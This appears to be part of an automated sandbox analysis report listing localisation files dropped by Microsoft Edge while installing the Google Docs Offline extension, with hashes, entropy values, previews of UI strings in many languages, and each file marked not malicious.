                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2535
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                  MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                  SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                  SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                  SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1028
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                  MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                  SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                  SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                  SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):994
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                  MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                  SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                  SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                  SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2091
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                  MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                  SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                  SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                  SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2778
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                  MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                  SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                  SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                  SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1719
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                  MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                  SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                  SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                  SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):936
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                  MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                  SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                  SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                  SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):3830
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                  MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                  SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                  SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                  SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1898
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                  MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                  SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                  SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                  SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                  MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                  SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                  SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                  SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):878
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                  MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                  SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                  SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                  SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2766
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                  MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                  SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                  SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                  SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7628_881450565\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):978
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                  MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                  SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                  SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                  SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
